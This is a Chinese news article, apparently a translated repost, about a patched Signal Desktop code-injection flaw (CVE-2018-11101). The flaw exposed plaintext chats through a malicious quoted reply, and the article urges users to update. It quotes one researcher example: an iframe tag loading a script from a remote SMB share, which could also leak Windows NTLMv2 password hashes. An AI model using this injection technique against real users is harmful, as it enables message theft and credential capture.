返回

Signal桌面应用程序中的另一个严重缺陷是黑客可以用明文窃取你的聊天记录

发布时间:2022-10-04 19:32:11 339
# javascript# 服务器# 漏洞# 脚本# 服务器
signal-hacking-exploit

由同一组安全研究人员于周一发现,新发现的漏洞与前一个漏洞构成了相同的威胁,远程攻击者只需向收件人发送一条消息,无需任何用户交互。
 
了解有关第一个代码注入漏洞的更多信息(CVE-2018-10994),您可以阅读我们之前的文章,其中介绍了研究人员如何发现信号缺陷及其工作原理。

两者之间的唯一区别在于,之前的漏洞存在于处理聊天中共享链接的功能中,而新漏洞(CVE-2018-11101)存在于处理引用消息验证的不同功能中,即在回复中引用之前的消息。
signal-code-execution-flaw
换句话说,要利用易受攻击的Signal desktop app版本上新修补的漏洞,攻击者只需将恶意HTML/javascript代码作为消息发送给受害者,然后用任意文本引用/回复同一消息。

如果受害者在其易受攻击的Signal desktop应用程序上收到包含恶意负载的引用消息,它将自动执行负载,而无需任何用户交互。

利用信号代码注入窃取明文聊天记录

到目前为止,用于证明Signal中代码注入漏洞的概念验证有效载荷仅限于将HTML iFrame或图像/视频/音频标签嵌入受害者的桌面应用程序。

然而,研究人员现在已经成功地开发出一种新的PoC漏洞,远程攻击者只需向受害者发送一条消息,就可以成功地窃取受害者的所有明文信号对话。
 
这种黑客攻击实际上破坏了端到端加密消息应用程序的目的,使得远程攻击者能够轻松获得用户的纯文本对话,而不破坏加密。

攻击者也可能窃取Windows密码

更糟的是什么?

在他们的博客文章中,研究人员还指出,攻击者甚至可以使用HTML iFrame包含来自远程SMB共享的文件,这可能被滥用来窃取Windows用户的NTLMv2哈希密码。
“在Windows operative系统中,CSP无法阻止通过SMB协议远程包含资源。在这种情况下,可以通过引用SMB共享中的脚本作为iframe标记的源来实现JavaScript的远程执行,例如:&lt,iframe src=\\DESKTOP-XXXXX\Temp\test。html&gt,然后回答,”研究人员解释道。
虽然他们没有声称任何关于这种形式的攻击的说法,但我推测,如果攻击者可以利用代码注入,迫使Windows操作系统使用单点登录启动与攻击者控制的SMB服务器的自动身份验证,它最终会将受害者的用户名和NTLMv2哈希密码移交给攻击者,有可能让他们进入受害者的系统。

我们已经看到,同样的攻击技术最近是如何利用上个月披露的Microsoft Outlook中的漏洞进行攻击的。

目前我无法证实这一说法,但我们很少与安全研究人员联系以证实这一点。

研究人员,伊万·阿里尔·巴雷拉·奥罗、阿尔弗雷多·奥尔特加、朱利亚诺·里佐和马特·布莱恩特,负责地向Signal报告了该漏洞,其开发人员已通过针对Windows、macOS和Linux用户发布Signal desktop 1.11.0版修补了该漏洞。

然而,《黑客新闻》获悉,在研究人员发现并报告第一个漏洞之前,信号开发人员已经将该问题确定为全面修复第一个漏洞的一部分。

Signal app具有自动更新机制,因此大多数用户必须已经安装了更新。您可以阅读本指南,以确保是否正在运行更新版本的Signal。

如果你不这样做,你应该立即更新你的桌面信号尽快,因为现在的漏洞构成了一个严重的风险,让你的秘密对话暴露在明文中的攻击者和进一步的严重后果。

 

特别声明:以上内容(图片及文字)均为互联网收集或者用户上传发布,本站仅提供信息存储服务!如有侵权或有涉及法律问题请联系我们。
举报
评论区(0)
按点赞数排序
用户头像
精选文章
thumb 中国研究员首次曝光美国国安局顶级后门—“方程式组织”
thumb 俄乌线上战争,网络攻击弥漫着数字硝烟
thumb 从网络安全角度了解俄罗斯入侵乌克兰的相关事件时间线